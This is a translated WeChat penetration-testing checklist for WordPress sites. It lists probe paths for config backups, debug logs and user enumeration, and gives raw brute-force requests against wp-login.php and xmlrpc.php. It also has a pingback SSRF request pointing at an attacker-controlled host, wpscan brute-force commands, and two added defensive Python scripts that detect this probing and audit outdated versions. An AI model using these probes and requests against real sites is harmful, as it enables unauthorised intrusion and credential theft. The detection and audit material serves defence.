Preface
When we encounter a site built on WordPress during a penetration test, how should we test it?
- Find the login endpoint and brute-force the password
- Check the core, plugin and theme versions and look up the related CVEs
Common paths
Login page
https://target.com/wp-login.php
WordPress version information
https://target.com/feed
https://target.com/?feed=rss2
Plugin version
https://target.com/wp-content/plugins/PLUGINNAME/readme.txt
https://target.com/wp-content/plugins/PLUGINNAME/readme.TXT
https://target.com/wp-content/plugins/PLUGINNAME/README.txt
https://target.com/wp-content/plugins/PLUGINNAME/README.TXT
PLUGINNAME is a placeholder for the plugin slug; tools such as wpscan or nuclei can enumerate installed plugins in bulk.
Theme version
https://target.com/wp-content/themes/THEMENAME/style.css
https://target.com/wp-content/themes/THEMENAME/readme.txt (if the theme ships a readme file)
If you find an outdated core, plugin or theme, look up the corresponding vulnerability on https://wpscan.com
Log file
http://target.com/wp-content/debug.log
Look for wp-config backup files
http://target.com/.wp-config.php.swp
http://target.com/wp-config.inc
http://target.com/wp-config.old
http://target.com/wp-config.txt
http://target.com/wp-config.html
http://target.com/wp-config.php.bak
http://target.com/wp-config.php.dist
http://target.com/wp-config.php.inc
http://target.com/wp-config.php.old
http://target.com/wp-config.php.save
http://target.com/wp-config.php.swp
http://target.com/wp-config.php.txt
http://target.com/wp-config.php.zip
http://target.com/wp-config.php.html
http://target.com/wp-config.php~
Obtain site usernames
http://target.com/?author=1
http://target.com/wp-json/wp/v2/users
http://target.com/?rest_route=/wp/v2/users
Registration
http://example.com/wp-login.php?action=register
Brute-force the admin account password
POST /wp-login.php HTTP/1.1
Host: target.com

log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1
or
POST /xmlrpc.php HTTP/1.1
Host: target.com

<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>BRUTEFORCE_IN_HERE</value></param>
</params>
</methodCall>
SSRF in WordPress
POST /xmlrpc.php HTTP/1.1
Host: target.com

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://yourip:port</string></value>
</param><param>
<value>
<string>https://target.com/</string>
</value>
</param></params>
</methodCall>
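The reconnaissance paths listed above (wp-config backups, debug.log, plugin and theme readmes, ?author= and the REST users endpoint) and the two brute-force channels (wp-login.php and xmlrpc.php) all leave a distinctive trail in the web server access log. The following Python script is an added example, not part of the original post, showing how a defender can flag both patterns: it parses combined-format log lines, labels requests for the sensitive paths from the checklist, and counts POSTs to the login endpoints per source IP in a sliding one-minute window. The log lines, IP addresses and the threshold of 10 POSTs per minute are constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache/nginx "combined" log format: ip ident user [timestamp] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Paths from the checklist that a normal visitor almost never requests; first match wins.
SENSITIVE_PATTERNS = [
    ("wp-config backup", re.compile(r"/\.?wp-config(?:\.php)?(?:\.(?:swp|inc|old|txt|html|bak|dist|save|zip)|~)$")),
    ("debug log", re.compile(r"/wp-content/debug\.log$")),
    ("plugin readme", re.compile(r"/wp-content/plugins/[^/]+/readme\.txt$", re.I)),
    ("theme fingerprint", re.compile(r"/wp-content/themes/[^/]+/(?:style\.css|readme\.txt)$", re.I)),
    ("author enumeration", re.compile(r"^/\?author=\d+$")),
    ("REST user enumeration", re.compile(r"^/(?:wp-json/wp/v2/users|\?rest_route=/wp/v2/users)")),
    ("registration page", re.compile(r"^/wp-login\.php\?action=register$")),
]

# Endpoints that accept credentials; repeated POSTs here are the brute-force signal.
LOGIN_ENDPOINTS = {"/wp-login.php", "/xmlrpc.php"}


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def classify_path(path):
    """Return the sensitive-path label for `path`, or None for ordinary traffic."""
    for label, pattern in SENSITIVE_PATTERNS:
        if pattern.search(path):
            return label
    return None


def detect(lines, window=timedelta(minutes=1), threshold=10):
    """Run two detections over raw log lines.

    Returns (recon, brute): recon is a list of (ip, label, path) for every request
    to a sensitive path; brute maps an IP to the largest number of POSTs it sent to
    wp-login.php or xmlrpc.php inside one `window`, for IPs exceeding `threshold`.
    """
    recon = []
    recent_posts = defaultdict(deque)  # ip -> timestamps of recent credential POSTs
    brute = {}
    for raw in lines:
        rec = parse_line(raw)
        if rec is None:
            continue
        label = classify_path(rec["path"])
        if label:
            recon.append((rec["ip"], label, rec["path"]))
        if rec["method"] == "POST" and rec["path"].split("?")[0] in LOGIN_ENDPOINTS:
            q = recent_posts[rec["ip"]]
            q.append(rec["ts"])
            while q and rec["ts"] - q[0] > window:  # drop timestamps outside the window
                q.popleft()
            if len(q) > threshold:
                brute[rec["ip"]] = max(brute.get(rec["ip"], 0), len(q))
    return recon, brute


def _line(ip, sec, method, path, status):
    """Build one constructed log line `sec` seconds after a fixed start time."""
    ts = (datetime(2024, 3, 12, 10, 0, 0) + timedelta(seconds=sec)).strftime("%d/%b/%Y:%H:%M:%S +0000")
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 0 "-" "Mozilla/5.0"'


# Constructed sample log: one host doing recon then brute-forcing wp-login.php,
# another hammering xmlrpc.php, and one ordinary visitor with a single login.
SAMPLE_LOG = (
    [_line("203.0.113.10", 1, "GET", "/wp-content/plugins/wp-file-manager/readme.txt", 200),
     _line("203.0.113.10", 2, "GET", "/wp-config.php.bak", 404),
     _line("203.0.113.10", 3, "GET", "/?author=1", 301),
     _line("203.0.113.10", 4, "GET", "/wp-json/wp/v2/users", 200)]
    + [_line("203.0.113.10", 10 + i, "POST", "/wp-login.php", 200) for i in range(15)]
    + [_line("198.51.100.7", 20 + 2 * i, "POST", "/xmlrpc.php", 200) for i in range(12)]
    + [_line("192.0.2.5", 30, "GET", "/", 200),
       _line("192.0.2.5", 31, "POST", "/wp-login.php", 302)]
)

if __name__ == "__main__":
    recon_hits, brute_hits = detect(SAMPLE_LOG)
    for ip, label, path in recon_hits:
        print(f"recon  {ip:15} {label:22} {path}")
    for ip, count in brute_hits.items():
        print(f"brute  {ip:15} {count} credential POSTs within one minute")
```

The 404 on the wp-config backup probe is still reported: a failed probe is the earliest signal that someone is working through this checklist, and the sequence readme, backup file, author ID, REST users from a single IP is a much stronger indicator than any one request alone. Tune `threshold` to the site's real login rate before alerting on it.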
Testing with tools
The wpscan tool
WPScan is a WordPress security scanner used to detect and report WordPress vulnerabilities.
WPScan is a WordPress vulnerability scanner created by Ryan Dewhurst and sponsored by Sucuri. It comes preinstalled on BackBox Linux, Kali Linux, Pentoo, SamuraiWTF and BlackArch, but Windows is not supported.
Enumerate the WordPress version, themes and plugins
wpscan --url http://site.com/test/ --enumerate p
wpscan --url http://site.com/test/ --enumerate t
Enumerate WordPress users
wpscan --url http://site.com/test/ --enumerate u
Password brute force
wpscan --url http://site.com/test/ --wordlist /root/Desktop/password.txt --username kcwto
Enumerate timthumbs
wpscan --url http://site.com/test/ --enumerate tt
Store the output in a separate file
wpscan --url http://site.com/test/ --debug-output 2>debug.log
nuclei
nuclei.exe -u https://xxx.xxx.xxx/
Historical WordPress vulnerabilities
Most of them are plugin vulnerabilities, so first check whether the WordPress site actually has a plugin (and version) matching the vulnerable conditions.
After obtaining the plugin version, visit https://wpscan.com
https://wpscan.com/wordpresses/
https://wpscan.com/plugins/
Plugin vulnerability lookup
For example, to look up known vulnerabilities in wp-file-manager:
https://wpscan.com/plugin/wp-file-manager/
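The step described above, reading the core version from the feed, the plugin version from readme.txt and the theme version from style.css and then deciding whether each is older than the first patched release, is exactly what a site owner's own patch audit needs to do. The following Python script is an added example, not part of the original post or of WPScan: it extracts the three versions from constructed sample artefacts and compares them against a table of minimum patched versions. The sample readme.txt, style.css, feed XML and every version number in FIXED_IN are placeholders for illustration; the real minimum version for a given plugin comes from the advisory you look up on wpscan.com.

```python
import re

# Constructed sample artefacts (not fetched from any real site), in the formats WordPress
# uses for the three version sources named in the checklist.
PLUGIN_README = """\
=== Example File Manager ===
Contributors: example
Tags: files
Requires at least: 5.0
Tested up to: 6.4
Stable tag: 6.8
Requires PHP: 7.0
"""

THEME_STYLE_CSS = """\
/*
Theme Name: Example Theme
Theme URI: https://example.com/
Version: 2.1.4
*/
"""

FEED_XML = """<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"><channel>
<title>Example</title>
<generator>https://wordpress.org/?v=6.2.1</generator>
</channel></rss>"""


def plugin_version(readme_text):
    """Version from the 'Stable tag:' header of a plugin readme.txt, or None."""
    m = re.search(r"^Stable tag:\s*(\S+)", readme_text, re.M)
    return m.group(1) if m else None


def theme_version(style_css):
    """Version from the 'Version:' line of a theme's style.css header, or None."""
    m = re.search(r"^\s*Version:\s*(\S+)", style_css, re.M)
    return m.group(1) if m else None


def core_version(feed_xml):
    """WordPress core version from the <generator> element of the RSS feed, or None."""
    m = re.search(r"<generator>https?://wordpress\.org/\?v=([\d.]+)</generator>", feed_xml)
    return m.group(1) if m else None


def version_tuple(v):
    """'6.8' -> (6, 8). Non-numeric parts such as 'trunk' sort older than any number."""
    return tuple(int(p) if p.isdigit() else -1 for p in v.split("."))


def is_outdated(found, minimum_fixed):
    """True when `found` is strictly older than the first fixed release."""
    a, b = version_tuple(found), version_tuple(minimum_fixed)
    n = max(len(a), len(b))
    return a + (0,) * (n - len(a)) < b + (0,) * (n - len(b))  # pad so 6.8 == 6.8.0


def audit(inventory, fixed_in):
    """Return the subset of `inventory` whose version is older than the fix in `fixed_in`."""
    return {
        name: found
        for name, found in inventory.items()
        if found and name in fixed_in and is_outdated(found, fixed_in[name])
    }


def build_inventory():
    """Inventory built from the constructed artefacts above."""
    return {
        "wordpress": core_version(FEED_XML),
        "wp-file-manager": plugin_version(PLUGIN_README),
        "example-theme": theme_version(THEME_STYLE_CSS),
    }


# Placeholder minimum patched versions for illustration only; not real advisory data.
FIXED_IN = {
    "wordpress": "6.4.3",
    "wp-file-manager": "6.9",
    "example-theme": "2.1.0",
}

if __name__ == "__main__":
    for name, found in audit(build_inventory(), FIXED_IN).items():
        print(f"OUTDATED {name}: {found} < {FIXED_IN[name]}")
```

Padding both tuples before comparing is what keeps 6.8 from being treated as older than 6.8.0, and mapping a non-numeric segment to -1 makes a "trunk" stable tag count as unknown-and-old rather than raising. Note that a readme.txt reports the version the author packaged, not necessarily the version running, so the result is a prioritisation list to confirm in the admin dashboard, not a final verdict.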
Other historical vulnerabilities
https://mp.weixin.qq.com/s/aakTQ9fgUVzG61uEPySLXA
CVE-2022-2633 https://mp.weixin.qq.com/s/8vVpFgL0tAXETByy59QiEA
References
https://mp.weixin.qq.com/s/IoO-T06od01GbR3s8RqBxw
https://mp.weixin.qq.com/s/jLBVuicMgW9d9_ZMu45Jcg
Originally published on the WeChat official account 进击的HACK: "When penetration testing meets WordPress"